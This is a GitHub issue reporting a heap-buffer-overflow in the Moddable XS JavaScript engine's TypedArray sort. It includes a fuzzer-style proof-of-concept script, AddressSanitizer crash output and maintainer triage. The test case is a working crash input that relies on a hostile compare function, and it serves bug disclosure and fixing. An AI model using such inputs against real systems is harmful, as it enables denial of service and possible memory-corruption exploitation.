Moddable-OpenSource/moddable #752: Heap-buffer-overflow xs/sources/xsDataView.c:2939 in fxUint32Getter

hope-fly, 2021-12-15:
##### Moddable-XS revision

Commit: [db8f973](https://github.com/Moddable-OpenSource/moddable/commit/db8f9735c20c07c189d7f4a0574e787d4a6669ea)

Version: 11.5.0 32 4

##### Build environment

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

##### Build steps

```bash
cd  ~/moddable/xs/makefiles/lin
#(debug)
make -f xst.mk 
```

##### Test case

```javascript
function JSEtest() {
    const v4 = [
        13.37,
        13.37
    ];
    const v6 = [
        1337,
        1337
    ];
    const v7 = v4.__proto__;
    isFinite[-4294967297] = isFinite;
    const v8 = 1337 | 1337;
    const v9 = v8 % v6;
    const v11 = [
        13.37,
        13.37,
        13.37,
        13.37,
        13.37
    ];
    const v12 = [
        13.37,
        13.37,
        isFinite
    ];
    const v13 = {
        d: v4,
        constructor: 1337,
        e: v12
    };
    let v14 = v4;
    const v17 = new Uint32Array(1337);
    let v20 = 0;
    do {
        const v21 = v17.sort(isFinite);
        const v22 = v20 + 1;
        v20 = v22;
    } while (v20 < 2);
    const v23 = 0 + Uint32Array;
    const v24 = v23[v14];
    const v25 = v7[3];
    const v27 = { set: isFinite };
    const v29 = Object.defineProperty(v13, -2209740409, v27);
    let v35 = 1337;
    const v36 = v35 + 1;
    v35 = v36;
    const v37 = v17.reverse();
    let v40 = 0;
    const v41 = v40 + 1;
    v40 = v41;
    v4[4100141134] = v40;
    const v42 = {
        getOwnPropertyDescriptor: isFinite,
        call: isFinite
    };
    const v44 = new Proxy(v13, v42);
    const v45 = 'number'.trim();
    let v46 = v17;
    const v47 = 10[1337];
    const v48 = isFinite(v46);
}
JSEtest();
```

##### Execution  & Output

```bash
 $ ./xst test.js

=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1d602fe7fc at pc 0x55611382ce77 bp 0x7ffd56f94c00 sp 0x7ffd56f94bf0
READ of size 4 at 0x7f1d602fe7fc thread T0
    #0 0x55611382ce76 in fxUint32Getter /root/moddable/xs/sources/xsDataView.c:2939
    #1 0x5561137ddfbb in fxCompareTypedArrayItem /root/moddable/xs/sources/xsDataView.c:1234
    #2 0x5561137e17d9 in fx_TypedArray_prototype_sort /root/moddable/xs/sources/xsDataView.c:2303
    #3 0x556113ac2a1d in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #4 0x556113b2942c in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #5 0x556113d378d1 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #6 0x55611366f05e in main /root/moddable/xs/tools/xst.c:281
    #7 0x7f1d64427bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #8 0x556113670789 in _start (/root/moddable/build/bin/lin/debug/xst+0x93789)

0x7f1d602fe7fc is located 4 bytes to the left of 16777248-byte region [0x7f1d602fe800,0x7f1d612fe820)
allocated by thread T0 here:
    #0 0x7f1d64e92b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x5561139a40cd in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/moddable/xs/sources/xsDataView.c:2939 in fxUint32Getter
Shadow bytes around the buggy address:
  0x0fe42c057ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe42c057cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe42c057cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe42c057cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe42c057ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0fe42c057cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
  0x0fe42c057d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe42c057d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe42c057d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe42c057d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe42c057d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
========ABORTING
```

eternalsakura, 2021-12-15:
https://github.com/Moddable-OpenSource/moddable/issues/749

This issue is a duplicate of issue-749 submitted by me, Please check it :)

hope-fly, 2021-12-15:
I have modified some information unmatched. PTLK.
The affected function fxUint8Getter is different from fxFloat32Getter.

phoddie, 2021-12-15:
It appears that root cause here is the same as #749. The POC here is more clear: the problem happens with a malicious compare function. We'll investigate further.

It should be possible to exploit the same root  cause with any TypedArray.

closed 2021-12-21 by phoddie